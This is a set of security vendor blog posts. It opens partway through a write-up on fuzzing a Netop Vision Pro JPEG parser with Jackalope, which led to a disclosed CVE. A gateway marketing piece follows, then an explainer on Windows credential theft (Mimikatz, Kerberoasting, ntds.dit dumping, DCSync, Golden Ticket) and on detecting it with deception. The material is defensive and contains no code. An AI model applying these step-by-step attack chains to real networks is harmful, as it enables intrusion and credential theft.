Examining the test code, it becomes apparent the test binary simply crashes if it finds the word “test” in memory. It causes a crash by attempting to write the value “1” at an invalid memory address, “NULL”.  Therefore, to ensure the fuzzer is working properly we need to create a small input corpus. This can be done by creating an “in” directory and placing a couple of text files within it, one containing the word “test”. We are not looking for crashes or new vulnerabilities during this test, but simply making sure our setup is functioning as expected. The test run can be seen in Figure 2, where the command to execute the test case was taken from the Jackalope documentation.

Figure 2 Testing fuzzer

Target Selection

When selecting an overall target function, it’s first important to look at how an application takes input alongside with how the fuzzer can tailor that input. Jackalope is designed to provide either a file or a chunk of shared memory to the target. This gives a lot of flexibility since almost anything can be set up as shared memory including network packet payloads. The trick becomes how to pass the file or shared memory to the target. In larger applications on Windows, a typical approach is to determine what functionality you want to fuzz, find a DLL that exports a function within the target code path, and pass that function the input. The closer the exported function is to the end of the desired code path to fuzz, the less headaches, and better results you will have trying to exercise the desired code.

Through the research done on Netop, we had a deep insight into how the system functions and the very large number of DLLs that it contains along with the numerous amounts of exported functions. After review, the function MeImgLoadJpeg which is exported in MeImg.dll stuck out as a good place to get started.

Figure 3 MeImgLoadJpeg Header

What makes this a good candidate for fuzzing? First, how, and when this function is executed is important. This function gets executed on both the student and teacher machines whenever a JPEG image is loaded into the system. For students this is when an image is pushed over the network to them; for example: when a teacher uses the blank screen feature on a student. On the teacher’s machine this function is called when a teacher loads an image to send to the student. The key components here are that it is potentially executed often, input can come from a local file or a network file and it affects both components of our system.

Second, when investigating this function further, the parameters are fuzzing friendly. Through light reversing, it can easily be seen that it takes a file path and opens the file directly within the function. This makes fuzzing it with Jackalope very simple since it supports file fuzzing and we won’t need to open or manipulate the test file in memory. Also, very few parameters are passed, one of which (BITMAPINFOHEADER), is well documented by Microsoft, making it simpler to construct valid calls. This also is true for the return parameter, HBITMAP. This will make it easy to determine success and failure conditions. Lastly, the fuzzable component of this function is a JPEG file. JPEG is a well-documented format and a well-fuzzed format, making test corpus generation and potentially crash analysis simpler.

Writing the Test Harness

In most fuzzing setups, a custom program is necessary to setup the required structure and complete any initialization required by the target function. This is commonly referred to as the test harness. It is required any time your target for fuzzing is not the main binary or executable, which tends to be the case most of the time. For example, if you want to fuzz a small executable like the “file” command on Linux, you don’t always require a test harness, since the binary takes its input (a file) directly from the command line and there is little to no setup required to get to your desired state. However, in many cases, especially on Windows, it is common to be looking to fuzz part of the code that is often not as directly accessible or requires setup before it can be passed the fuzzed data. This is where a test harness comes into play. Using the Jackalope “test.cpp” file provided in the GitHub repo, it is easy to see an example of what is needed when writing a test harness. The harness needs to configure the incoming test case as ether a file or shared memory input, set up parameters for the target function, call the function, and, if needed, create a crash to indicate a found crash to Jackalope.

To get started we first must load the DLL which contains our target function. In Windows this is usually performed with a call to “LoadLibrary”. Since our entire purpose is to fuzz a function within this DLL, if it fails to load, we should just exit.

Figure 4 LoadLibrary

Now that the DLL is loaded into memory, we need to obtain the address of our target function. This is commonly done through “GetProcAddress”.

Figure 5 GetProcAddress

The next step, setting up the parameters for the target function, is arguably the most crucial and can be the most difficult step in building a test harness. The best trick to get this right is to find examples of your target function being called in the real application and then mimic this setup in your test harness.  In Netop, this function is only called by one other function. Figure 6 shows a slightly cleaned up version of a portion of the IDA decompilation of the function which calls MeImgLoadJpeg.

Figure 6 IDA Pro Decomplication of call to MeImgLoadJpeg

We can learn some key points from this call that are important to keep consistent if we want to find a useful crash. We know the first parameter (a2) is simply a file path. In our code, we do need to ensure our file path is in the format of a wide-character, since this is the typical format for a Windows file path. The second parameter (v8) is a Windows BITMAPINFOHEADER object. We can see from this code all the members of the BITMAPHEADER object are being set to 0 using a “memset”, except the “biSize”, which is being set to “40”. Since this is the only time this function is called in the Netop application, if we want to find a bug that has a chance to be leveraged through Netop, we need to follow this format. Why the value is set to 40 is less relevant for our purposes within the test harness; however, it may require investigation depending on any crashes found. The same principle holds true for the 3rd and final parameter. We see here it is hardcoded to zero, so we want to do the same. Could we test other values? Of course, but if Netop is hardcoded to zero we would never actually be able to pass anything else outside of our exercise. Using our additional understanding from Figure 6, we put the below code in Figure 7 into our harness.

Figure 7 Target Function Setup

With our parameters configured, we now need to simply call the function we want to fuzz. Where is the fuzzed data? In this case, our fuzzed data will be the jpeg file. The fuzzer will be passing a file path of a mutated jpeg file.

Figure 8 Calling MeImgLoadJpeg

This next step is highly dependent on the target function. If the target function will not fail in a manner that will crash your harness (throw an unhandled exception), then you need to create a crash for a failed test case. This can be seen in Figure 1 test.cpp. In this case, the target function has error handling and we are interested in any case which causes an unhandled exception within our DLL. If the DLL throws an unhandled exception, it will crash our test harness. As a result, we only need to check the return value for our own purposes to confirm things are working properly. This is good for initially testing, but we will want to remove any unnecessary code for our actual fuzz run. A non-null return value means the jpeg image was parsed and null means a handled error occurred, which is uninteresting for our case.

Figure 9 Checking the return value

With all this framework in place, we can run our harness with a valid image and confirm we get the expected result.

Figure 10 Test run

Performance Considerations

Although the above test harness code will successfully execute the target function and fully function within our fuzzer, we can make a few targeted changes to increase performance and results. One of the slowest operations in an application is printing to the screen, and this is true when fuzzing. Error checking is extremely helpful for development; however, printing “Result was not null” or the inverse every time will reduce our executions per second and doesn’t add anything to our fuzzer. Additionally, it is important not to introduce any extra code in our “fuzz” function which could potentially introduce additional code paths. This could cause the mutators to think that it found a new path of interesting code, when in fact it’s only the harness. As a result, you want your “fuzz” function to be the absolute bare minimum required to execute your code and perform other setup actions outside this function.

Selecting a Test Corpus

Now that we have a working test harness, we need to create a test corpus or input files for the fuzzer. The importance of this step for fuzzing cannot be overstated. The test cases produced by a fuzzer or only as good as the ones provided. In most cases, you are looking to create a set of minimal test inputs (and minimal size) that generate maximal code coverage.

Selecting or building a test corpus can be a complicated process. One of the advantages to using a known and popular format like JPEG is that there are many open-source corpora. Strongcourage’s corpus on GitHub is a great repo since it is many corpora combined and is the testing corpus that was used to find CVE-2021-36134. Jackalope does not recursively traverse directories when reading the input directory and does not throw an error in this regard, therefore it is important to make sure your corpus directory is only one level deep.


Using this basic outlined method and running Jackalope in the same fashion as the example test binary, a write access violation crash is found in the MeImgLoadJpeg in just a few minutes. This write access violation bug is filed as CVE-2021-36134.

This violation occurs because of memory being allocated for the destination of a memory copy based on the default three color components of a JPEG image, instead of using the value provided in the input file’s JPEG header. The copy is using the values provided by the file to determine the address of where to copy the image in memory. A write access violation occurs when a malformed image reports having four color components instead of the default three and the memory allocated is not the same size as the actual image.

Given the extensive prior reports and full system vulnerabilities we submitted to NetOp before, we decided not to take the analysis further and determine if the bug was truly exploitable. The code path can be leveraged over the network, by utilizing the teacher’s blank student screen feature. It is worth noting this code runs on both the student and the teacher, so the teacher would be unable to load this image to send to a student without crashing their own system. An attacker could leverage the previously discovered and disclosed vulnerabilities to emulate a teacher and send this image to a student regardless.  Since the destination of the memory copy is being calculated based on image width and number of color components, it is plausible for an attacker to control where the “write” takes place; however, they would need to use an address space that could be calculated without invalidating the image further. In addition, the code is writing pixels from the image which is also under the attacker’s control. As a result, this could lead to a partial arbitrary write.


Fuzzing can be a fantastic tool for discovering new vulnerabilities in software. Although having source code can enhance fuzzing, it should not be considered a barrier of entry. Many tools and techniques exist which can be used to successfully fuzz blackbox targets and in turn help enhance the security of the industry.

One goal of the McAfee Enterprise Advanced Threat Research team is to identify and illuminate a broad spectrum of threats in today’s complex and constantly evolving landscape. Leveraging Google Project Zero team’s Jackalope and blackbox fuzzing techniques a JPEG parsing vulnerability, CVE-2021-36134 was discovered in Netop Vision Pro version 9.7.2. As per McAfee Enterprise’s vulnerability public disclosure policy, the ATR team informed Netop on June 25th, 2021, and worked directly with the Netop team. This partnership resulted in the vendor working towards effective mitigations of the vulnerability detailed in this blog.

The post Finding 0-days with Jackalope appeared first on McAfee Blogs.

What to Expect from the Next Generation of Secure Web Gateways Thu, 23 Sep 2021 19:42:27 +0000 /blogs/?p=102097

After more than a century of technological innovation since the first units rolled off Henry Ford’s assembly lines, automobiles, and...

The post What to Expect from the Next Generation of Secure Web Gateways appeared first on McAfee Blogs.


After more than a century of technological innovation since the first units rolled off Henry Ford’s assembly lines, automobiles, and transportation bear little in common with the Model T era. This evolution will continue as society finds better ways to achieve the outcome of moving people from point A to point B.

While Secure Web Gateways (SWGs) have operated on a far more compressed timetable, a similarly drastic evolution has taken place. SWGs are still largely focused on ensuring users are protected from unsafe or non-compliant corners of the internet, but the transition to a cloud and remote-working world has created new security challenges that the traditional SWG is no longer equipped to handle. It’s time for the next generation of SWGs that can empower users to thrive safely in an increasingly decentralized and dangerous world.

How We Got Here

The SWG actually started out as a URL filtering solution that enabled organizations to ensure that employees’ web browsing complied with corporate internet access policy.

URL filtering then transitioned to proxy servers sitting behind corporate firewalls. Since proxies terminate traffic coming from users and complete the connection to the desired websites, security experts quickly saw the potential to perform more thorough inspection than just comparing URLs to existing blacklists. By incorporating anti-virus and other security capabilities, the “Secure Web Gateway” became a critical part of modern security architectures. However, the traditional SWG could only play this role if it was the chokepoint for all internet traffic, sitting at the edge of every corporate network perimeter and having remote users “hairpin” back through that network via VPN or MPLS links.

Next-Generation SWG

The transition to a cloud and remote-working world has put new burdens on the traditional perimeter-based SWG. Users can now directly access IT infrastructure and connected resources from virtually any location from a variety of different devices, and many of those resources no longer reside within the network perimeter on corporate servers.

This remarkable transformation also expands the requirements for data and threat protection, leaving security teams to grapple with a number of new sophisticated threats and compliance challenges. Unfortunately, traditional SWGs haven’t been able to keep pace with this evolving threat landscape, resulting in an inefficient architecture that fails to deliver the potential of the distributed workforce.

Just about every major breach now involves sophisticated multi-level web components that can’t be stopped by a static engine. The traditional SWG approach has been to coordinate with other parts of the security infrastructure, including malware sandboxes. But as threats have become more advanced and complex, doing this has resulted in slowing down performance or letting threats get through. This is where Remote Browser Isolation (RBI) brings in a paradigm shift to advanced threat protection. When RBI is implemented as an integral component of SWG traffic inspection, it can deliver real-time, zero-day protection against ransomware, phishing attacks, and other advanced malware so that even the most sophisticated threats can’t get through, without hindering the browsing experience.

Another issue with most traditional SWGs is that they aren’t able to sufficiently protect data as it flows from distributed users to cloud apps, due to lacking advanced data protection and cloud app intelligence. Without Data Loss Prevention (DLP) technology that is advanced enough to understand the nature of cloud apps and to keep up with evolved safety demands, organizations can find data protection gaps in their SWG solutions that keep them vulnerable to risks.

Finally, there is the question of cloud applications. While cloud applications operate on the same internet as traditional websites, they function in a fundamentally different way that traditional SWGs simply can’t understand. Cloud Access Security Brokers (CASBs) are designed to provide visibility and control over cloud applications, and if the SWG doesn’t have access to a comprehensive CASB application database and sophisticated CASB controls, it is effectively blind to the cloud. It’s only a cloud-aware SWG with integrated CASB functionality that can extend data protection to all websites and cloud applications, empowering organizations and their users to be better protected against advanced threats.

What we need from Next-Gen SWGs

Fig. Next Generation Secure Web Gateway Capabilities

A next-gen SWG should help simplify the implementation of Secure Access Service Edge (SASE) architecture and help accelerate secure cloud adoption. At the same time, it needs to provide advanced threat protection, unified data control, and efficiently enable a remote and distributed workforce.

Here are some of the use cases:

  • Enable a remote workforce with a direct-to-cloud architecture that delivers 99.999% availability. As countries and states slowly came out of the shelter-in-place orders, many organizations indicated that supporting a remote and distributed workforce will likely be the new norm. Keeping remote workers productive, data secured, and endpoints protected can be overwhelming at times. A next-gen SWG should provide organizations with the scalability and security to support today’s remote workforce and distributed digital ecosystem. A cloud-native architecture helps ensure availability, lower latency, and maintain user productivity from wherever your team is working. A true cloud-grade service should offer five nines (99.999%) availability consistently.
  • Reduce administrative complexity and lower cost – Today, with increased cloud adoption, more than 80% of traffic is destined for the internet. Backhauling internet traffic to a traditional “Hub and Spoke” architecture which requires expensive MPLS links can be very costly. Network slows to a halt as traffics spikes, and VPN for remote workers have proven to be ineffective. A next-gen SWG should support the SASE framework and provide a direct-to-cloud architecture that lowers the total operating costs by reducing the need for expensive MPLS links. With a SaaS delivery model, next-gen SWGs remove the need to deploy and maintain hardware infrastructure reducing hardware and operating costs, while increasing performance, reliability, and scalability.
  • Lock down your data, not your business – More than 95% of companies today use cloud services, yet only 36% of companies can enforce DLP rules in the cloud at all. Additionally, most traditional SWGs are not able to sufficiently protect data as it flows from distributed users to cloud applications, due to the lack of advanced data protection and cloud app intelligence. A next-gen SWG should offer a more effective way to enforce protection with built-in Data Loss Prevention templates and in-line data protection workflows to prevent restricted data from flowing out of the organization. A device-to-cloud data protection offers comprehensive data visibility and consistent controls across endpoints, users, clouds, and networks. With built-in DLP technology, next-gen SWGs ensure organizations remain compliant with corporate security policies, as well as industry and government regulations.
  • Defend against known and unknown threats – As the web continues to grow and evolve, web-born malware attacks also grow and evolve, beyond the protection that traditional SWGs can provide. Ransomware, phishing, and other advanced web-based threats are putting users and endpoints at risk. A next-gen SWG should feature the most advanced integrated security controls, including global threat intelligence and sandboxing, so that even the most sophisticated threats can’t get through. A next-gen SWG with threat protection solutions that work together is able to ensure consistent policies, data protection, and visibility across isolated and non-isolated traffic. A next-gen SWG should also include integrated Remote Browser Isolation to prevent unknown threats from ever reaching the endpoints.

SWGs have clearly come a long way from just being URL filtering devices to the point where they are essential to furthering the safe and accelerated adoption of the cloud. But we need to push the proverbial envelope a lot further. Digital transformation demands nothing less.


The post What to Expect from the Next Generation of Secure Web Gateways appeared first on McAfee Blogs.

Detecting Credential Stealing Attacks Through Active In-Network Defense Thu, 23 Sep 2021 04:01:59 +0000

Executive Summary Today, enterprises tend to use multiple layers of security defenses, ranging from perimeter defense on network entry points...

The post Detecting Credential Stealing Attacks Through Active In-Network Defense appeared first on McAfee Blogs.


Executive Summary

Today, enterprises tend to use multiple layers of security defenses, ranging from perimeter defense on network entry points to host based security solutions deployed at the end user’s machines to counter the ever-increasing threats. This includes inline traffic filtering and management security solutions deployed at access and distribution layers in the network, as well as out of band solutions like NAC, SIEM or User Behavior Analysis to provide identity-based network access and gain more visibility into the user’s access to critical network resources. However, layered security defenses face the major and recurring challenge of detecting newer exploitation techniques as they heavily rely on known behaviors. Additionally, yet another significant challenge facing the enterprise network is detecting post-exploitation activities, after perimeter security is compromised.

Post initial compromise, to be able to execute meaningful attacks, attackers would need to steal credentials to move laterally inside the network, access critical network assets and eventually exfiltrate data. They will use several sophisticated techniques to perform internal reconnaissance and remote code execution on critical resources, which range from using legitimate operating system tools to discover network assets to using novel code execution techniques on the target. Consequently, differentiating between the legitimate and malicious use of Windows’ internal tools and services becomes a high priority for enterprise networks.

To tackle this long-standing problem of detecting lateral movement, enterprise networks must formulate active in-network defense strategies to effectively prevent attackers from accessing critical network resources. Network Deception is one such defensive approach which could potentially prove to be an effective solution to detect credential theft attacks. Detecting credential stealing attacks with deception essentially requires building the necessary infrastructure by placing the decoy systems within the same network as production assets and configuring them with decoy contents to lure the attackers towards the decoy machines and services. Accurately configuring and tuning the deceptive network can deflect the attacker’s lateral movement path towards the deceptive services, consequently allowing the attackers to engage with the deceptive network, helping enterprises protect production assets.

MITRE Shield, a knowledge base maintained by MITRE for active defense techniques highlights many of the methods in adversary engagement. Some of the techniques described by MITRE Shield Matrix with respect to network deception are as below:

MITRE Shield Description ATT&CK Technique
Decoy Account – DTE0010 A decoy account is created for defensive or deceptive purposes. The decoy account can be used to make a system, service, or software look more realistic or to entice an action Account Discovery, Reconnaissance
Decoy Credentials – DTE0012 Seed a target system with credentials (such as username/password, browser tokens, and other forms of authentication data) Credential Access, Privilege Escalation
Decoy Diversity – DTE0013 deployment of decoy systems with varying Operating Systems and software configurations Reconnaissance
Decoy Network – DTE0014 Multiple computing resources that can be used for defensive or deceptive purposes Initial Access
Decoy Personna – DTE0015  Used to establish background information about a user. In order to have the adversary believe they are operating against real targets Initial Access, Discovery, Reconnaissance
Decoy System – DTE0017 Computing resources presented to the adversary in support of active defense Reconnaissance


Over the course of this paper, we will discuss some of the widely adapted credential theft attacks executed by adversaries after the initial compromise and then move on to discuss defense techniques against the above MITRE Shield attacks and how to use them effectively to detect deceptive credential usage in the network.

Network Deception – An Active in-network defensive approach

  • Most of the targeted attacks involve stealing credentials from the system at a certain point in time as attackers would use them to pivot to other systems in the network. Some of the credential stealing techniques like Golden Ticket attacks have been found to be used in multiple ransomwares armed with lateral movement capabilities.
  • Active in-network defense strategies described by the MITRE Shield matrix are significant and play a critical role in detecting credential abuse in the network.
  • Network Deception uses these active defense techniques to build the deceptive network infrastructure which could potentially lead to redirecting an attacker’s lateral movement path and engaging them to the decoy services without touching the critical production systems.
  • It involves placing decoy systems, decoy credentials and decoy contents all throughout the production network essentially converting it into a trap, playing a crucial role in mitigating the attacks.

McAfee Protection

  • McAfee MVISION Endpoint Security has the capabilities to protect against credential theft attacks like credential extraction from LSASS process memory via ATP rule 511. More details on configuring policies and a demo are available here.
  • McAfee MVISION Endpoint Detection and Response (EDR) has the capabilities to detect credential access from tools like Mimikatz.
  • With McAfee MVISION EDR and ENS integration with Attivo’s network and endpoint deception sensor, McAfee can manage its agents and receive alerts for detections in ePO and EDR.

Lateral Movement – Introduction

Lateral movement refers to the tools and techniques used by attackers to progressively expand their foothold within an enterprise network after gaining initial access. As shown in the figure below, lateral movement activity comprises of several stages starting from credential theft, target enumeration and discovery, privilege escalation, gaining access to network resources and eventually remote code execution on the target before exfiltrating data to accomplish a successful attack. Once inside the network, attackers will deploy a range of techniques at each stage of lateral movement to achieve their end goal. One of the primary challenges an attacker will face while moving laterally inside a network is to hide their activities in plain sight by generating a minimum volume of legitimate looking logs to be able to remain undetected. To achieve this, an attacker might choose to embed the tool within a malicious executable or use the operating system’s internal legitimate tools and services to perform its lateral movement operations, consequently making this network traffic harder to distinguish.

As per the Verizon DBIR report 2020, over 80% of data breaches involve credential theft attacks. Credential theft is one of the primary tasks attackers need to perform post-exploitation and after gaining initial control of the target machine. It will usually be the first step towards lateral movement strategies which will allow attackers to elevate their privileges and acquire access to other network resources. As indicated earlier, attackers have long been abusing Windows legitimate features like SMB, RPC over SMB, Windows Management Instrumentation, Windows Remote Management, and many other features to perform lateral movement activities. Figure 1 below highlights where lateral movement falls within the attack chain and its different stages. To remain stealthier, these activities would span a period ranging from many weeks to months.

Figure 1 – Stages of Lateral movement

To be able to distinguish between the admissible and malicious use of these inbuilt services, it is extremely critical for organizations to deploy advanced Threat Detection solutions. Over the course of this blog, we will discuss various credential theft techniques used by adversaries during lateral movement. We will also discuss an approach that can be used to effectively detect these techniques inside the network.

Credential Theft Attacks

Attackers use a variety of tools and techniques to execute credential theft attacks. Many of these tools are open source and readily available on the internet. Operating systems like Windows implement Single Sign On (SSO) functionality, which require the user’s credentials to be stored in memory, thereby allowing the OS to seamlessly access network resource without repeatedly asking the user to re-enter those credentials. Additionally, user credentials are stored in memory in a variety of formats like NTLM hashes, reversibly encrypted plaintext, Kerberos tickets, PINs, etc., which can be used to authenticate to services depending upon the supported authentication mechanism. These credentials can be acquired by attackers from memory by parsing appropriate credential storage structures or using the Windows credential enumeration APIs.  Consequently, these attacks pose major security concerns, especially in the domain environment if the attacker gains access to privileged credentials which can then be reused to access critical network resources. In the following sections, we discuss some of the widely adapted credential stealing techniques used by malware, with respect to the Windows operating system. Similar credential stealing techniques can also be used with other operating systems as well.

Stealing Credentials from LSASS Process Memory

The Local Security Authority Subsystem Service (LSASS) process manages and stores the credentials of all the users with active Windows sessions. These credentials stored in the LSASS process memory will allow users to access other network resource such as files shares, email servers and other remote services without asking them for the credentials again. LSASS process memory stores the credentials in many formats including reversibly encrypted plaintext, NTLM hashes, Kerberos Tickets (Ticket Granting Tickets, etc.). These credentials are generated and stored in the memory of the LSASS process when a user initiates the interactive logon to the machine such as console logon or RDP, runs a scheduled task or uses remote administration tools. The encryption and decryption of credentials is done using LsaProtectMemory and LsaUnProtectMemory respectively and hence a decryption tool using these APIs will be able to decrypt LSASS memory buffers and extract them. However, malware would need to execute with local administrator privileges and enable “SeDebugPrivilege” on the current process to be able access the LSASS process memory.

Below is a code snapshot from one of the famous credential harvesting tools, Mimikatz, enabling the required privileges on the calling thread before dumping the credentials.

Figure 2 – Checking for required privileges

We can see that the NTLM hash of the user’s credentials is revealed, and this can be brute forced offline as shown below. Many Windows services, such as SMB, support NTLM authentication and NTLM hashes can be used directly for authentication eliminating the need for the clear text passwords.

Figure 3 – Cracking NTLM Hashes offline

Attackers avoid using freely available tools like Mimikatz directly on the target machine to harvest credentials since they are easily detected by AVs. Instead, they use recompiled clones of it with minimal functionality to avoid noise. Below is one such instance where malware embeds recompiled Mimikatz code with the minimal required functionality.

Figure 4 – Credential extraction tool embedded inside malicious executable

Detection can also be avoided by using several “living off the land’ mechanisms, available in many post-exploitation frameworks, to execute the credential harvesting tools directly from memory using Reflective PE injection, where the binary is never written to the disk. Yet another approach is to dump the LSASS process memory using process dumping tools, exfiltrate the dump and extract the credentials offline. Microsoft has documented multiple ways to configure additional LSASS process protection which can prevent credentials being compromised.

Stealing Credentials from Security Accounts Manager (SAM) Database

The SAM database is a file on a local hard drive that stores the credentials for all local accounts on the Windows computer. NT hashes for all the accounts on the local machine, including the local administrator credential hash, are stored in the SAM database. The SAM database file is in %SystemRoot%system32/config and the hashes of the credentials are within the registry HKLM\SAM. Attackers need to acquire elevated privileges to be able to access the credentials from the SAM database. The example below demonstrates how the credentials from the SAM database can be revealed through a simple Meterpreter session.

Figure 5 – Dumping SAM database

Stealing Credentials from Windows Credential Manager (CredMan)

Windows Credential Manager stores the Web and SMB/RDP credentials of users if they choose to save them on the Windows machine, thereby preventing the authentication mechanism from asking for those passwords again on subsequent logins. These credentials are encrypted with Windows Data Protection APIs (DPAPI) CryptProtectData, either using the current user’s logon session or a generated master key, and then saved on the local hard drive. Consequently, any process running in the context of the logged in user will be able to decrypt the credentials using CryptUnProtectData DPAPI. In the domain environment, these credentials can be used by attackers to pivot to other systems in the network. Data Protection APIs provide the cryptographic functionalities that can be used to securely store credentials and keys. These APIs are used by several other Windows components like browsers (IE/Chrome), certificates and many other applications as well. Below is one example of how credential dumping tools like Mimikatz can be used to dump stored Chrome credentials.

Figure 6 – Dumping browser credentials

DPAPI can be abused in multiple ways. In the Active Directory domain joined environment, if other users have logged into the compromised machine, provided a malware is running with escalated privileges, it can extract other user’s master keys from the LSASS memory which can then be used to decrypt their secrets. Below is a screenshot of how the master key can be extracted by using the credential dumping tool.

Figure 7 – Extracting DPAPI Master Key

Malware also tends to use multiple variants of credential enumeration APIs available within Windows. These APIs can extract credentials from Windows Credential Manager. Below is one instance of the malware using CredEnumerateW API to retrieve credentials and then search for terminal services passwords which It would use to pivot to other systems.

Figure 8 – Extracting credentials using Windows API

Stealing Service Account Credentials Through Kerberoasting

In the domain joined environment, the Kerberos protocol has a significant role to play with respect to authentication and requesting access to services and applications. It provides Single-Sign-On functionality for accessing multiple shared resources within the enterprise network. The Kerberos authentication mechanism in Active Directory involves multiple requests and responses like Ticket Granting Ticket (TGT) and Ticket Granting Service (TGS) supported by a Key Distribution Server (KDC), usually a Domain Controller. Upon successful authentication, a user will be able to access the respective services.

Attackers gaining access to a system joined in the domain would usually look for high value assets like Active Directory Controller, Database server, SharePoint server, Web Server, etc., and these services are registered in the domain with the specific Service Principal Name (SPN) values, which is a unique identifier of the Service Account in the domain. These SPN values are used by Kerberos to map the instance with the logon account allowing the client to authenticate to the respective service. Well known SPN values are listed out here. Once the attacker is authenticated with any domain user credentials and has information about the SPN values of the services within the domain, they can initiate the Kerberos Ticket Granting Service request (TGS – REQ) to the Key Distribution Server with the specified SPN value. Details on how the SPN values are registered and used in Kerberos authentication is documented here. TGS response from the KDC will have the Kerberos Ticket encrypted with the hash of the service account. This ticket can be extracted from the memory and can be brute forced offline to acquire service account credentials, allowing a domain user to gain admin level access to the service.

Kerberoasting is a well-documented attack technique listed in MITRE ATT&CK and it essentially abuses the Kerberos authentication allowing adversaries to request the TGS Tickets for the valid service accounts and brute force the ticket offline to extract the plain text credentials of the service accounts, consequently enabling them to elevate their privileges from domain user to domain admin. As an initial step to this lateral movement technique, the attacker would perform an internal reconnaissance to gain information about the services registered in the domain and get SPN values. A simple PowerShell command after importing the Active Directory PowerShell module, as shown below, can initiate the LDAP query to get information about all the user accounts from the Domain Controller with the SPN value set.

Figure 9 – PowerShell command to generate LDAP query

Attackers can specifically choose to scan the domain for MSSQL service with the registered SPN value used for Kerberos authentication. PowerShell scripts like GetUserSPNs can scan all the user SPNs in the domain or MSSQL service registered in the domain with Discover-PSMSSQLServers or Invoke-Kerberoast scripts.  Following is an example output from the script:

Figure 10 – Kerberoasting PowerShell script output

Once an attacker has the SPN value of the SQL service, a Kerberos Ticket Granting Service Ticket request (TGS-REQ) can be initiated to the domain controller with the SPN value. This can be done by a couple of PowerShell commands generating KRB-TGS-REQ as shown below:

Figure 11 – Kerberos TGS request

Consequently, the Domain Controller sends the TGS-RESP with the ticket of the service account which will be cached in the memory and can be extracted by dumping tools like Mimikatz as a .kirbi document. This can be brute forced offline by tgsrespcrack, allowing the attacker to gain unrestricted access to the service with elevated privileges.

Stealing Credentials from Active Directory Domain Service (ntdis.dit) File

As indicted earlier, once an attacker has penetrated the domain network, it will be natural to progress towards targeting critical assets, such as the Active Directory controller. The Active Directory Database Services AD DS Ntds.dit file is one of the most overlooked attack vectors in the domain environment but can have significant impact if the attacker is able to gain the domain administrative rights leading to complete domain compromise.

The Ntds.dit file is the authoritative store of credentials for all the users in the domain joined environment, storing all the information about the users, groups and memberships, including credentials (NT Hashes) of all the users in the domain with historical passwords and user’s DPAPI backup master keys. An Attacker with domain admin rights can gain access to the Domain Controller’s file system and acquire credentials like hashes, Kerberos tickets and other reversibly encrypted passwords of all the users joined in the domain by dumping and exfiltrating the Ntds.dit file. These credentials can then be used by the attacker to further access resources by using attack techniques like PTH within the network since the credentials used across other shared resource could be same.

Multiple techniques can be used to dump the Ntds.dit file from the Domain Controller locally as well as remotely and extract the NTLM hashes/DPAPI backup keys for all the domain joined users. One of the techniques is to use the Volume Shadow Copy Service using the vssadmin command line utility and then extract the Ntds.dit file from the volume shadow copy as shown below.

Figure 12 – Dumping Volume shadow copy for C drive

Sensitive data on Active Directory is encrypted with the Boot Key (Syskey) stored in the SYSTEM registry hive and dumping the SYSTEM registry hive is a prerequisite as well to be able to extract all the credentials.

Publicly available Active Directory auditing frameworks like DSInternals provide PowerShell cmdlets to extract the Syskey from the SYSTEM registry hive and extract all the credentials from the Ntds.dit file.

Ntds.dit can also give access to the powerful service account within the Active Directory Domain, KRBTGT (Key Distribution Centre Service account). Acquiring the NTLM hash of this account can enable the attacker to execute a Golden Ticket attack leading to complete domain compromise with unrestricted access to any service on the domain joined system.

Stealing Credentials Through a DCSync Attack – From Domain user to Domain Admin

A DCSync attack is a method of credential acquisition which allows an attacker to impersonate the Domain Controller and can consequently replicate all the Active Directory objects to the impersonating client remotely, without requiring the user to logon to the DC or dumping the Ntds.dit file. By impersonating the Domain Controller, the attacker could acquire the NTLM hash of the KRBTGT service account, enabling them to gain access to all the shared resources and applications in the domain joined environment. To be able to execute this credential stealing technique, an attacker would have to compromise the user account with the required permissions, specifically DS-Replication-Get-Changes and DS-Replication-Get-Changes-All, as shown below.

Figure 13 – User with privileges

Once the attacker compromises the user account with the required privileges, Pass-The-Hash attacks can be executed to spawn a command shell with the forged logon session. Credential dumping tools like Mimikatz do this by enumerating all the user logon sessions and replacing the user credentials with the stolen usernames and NTLM hashes provided, in the current logon session. Behind the scenes, this is executed by duplicating the current process’s access token, replacing the user credentials pointed by duplicated access token and subsequently using the modified access token to start a new process with the stolen credentials which will be used for network authentication. This is as shown below for example user “DCPrivUser”.

Figure 14 – Pass-the-Hash attack

Further, as indicated below, any subsequent NTLM authentication from the logon session will use the stolen credentials to authenticate to domain joined systems like the Active Directory Controller.

Attackers can now initiate the AD user objects Replication request to the Domain Controller using Directory Replication Services Remote Protocol (DRSUAPI). DRSUAPI is the RPC protocol used for replication of AD objects. With DCERPC bind request to DRSUAPI, an RPC call to DSGetNCChanges will replicate all the user AD objects to the impersonating client. Attackers would usually target the KRBTGT account since acquiring the NTLM hash of this account will enable them to execute a Golden Ticket attack resulting in unrestricted access to domain services and applications.

Figure 15 – DCSync Attack

As indicated earlier, with the NTLM hash of the KRBTGT account, adversaries can initiate a Golden Ticket attack (Pass-the-Ticket) by injecting the forged Kerberos tickets into the current session which can be used to authenticate to any service with the client that supports pass the ticket (for instance, sqlcmd.exe connection to DB server, PsExec, etc.)

Figure 16 – Golden ticket with forged Kerberos ticket

Detecting Credential Stealing Attacks with Network Deception

The credential theft techniques we discussed in the previous sections are just the tip of the iceberg. Adversaries can use many other sophisticated credential stealing techniques to take advantage of system misconfigurations and legitimate administrative tools and protocols and, at the same time, remain undetected for a longer period. With many other event management solutions with SIEMs, used in conjunction with other network security solutions, it becomes a challenge for administrators to distinguish malicious use of legitimate tools and services from lateral movement. Perimeter solutions have their limitations in terms of visibility once the attacker crosses the network boundary and is inside the domain environment. It is extremely critical for organizations to protect and monitor critical network assets like the Domain Controller, Database server, Exchange Servers, build systems and other applications or services, as compromising these systems will result in significant damages. Therefore, enterprise networks must deploy a solution to detect credential stealing attacks as they can be used to pivot to other systems on the network and move laterally once an attacker establishes an attack path to a high value target. If the deployment of a solution within the critical zones of the network can detect the use of stolen credentials before adversaries can reach their target, the critical assets could still be prevented from being compromised.

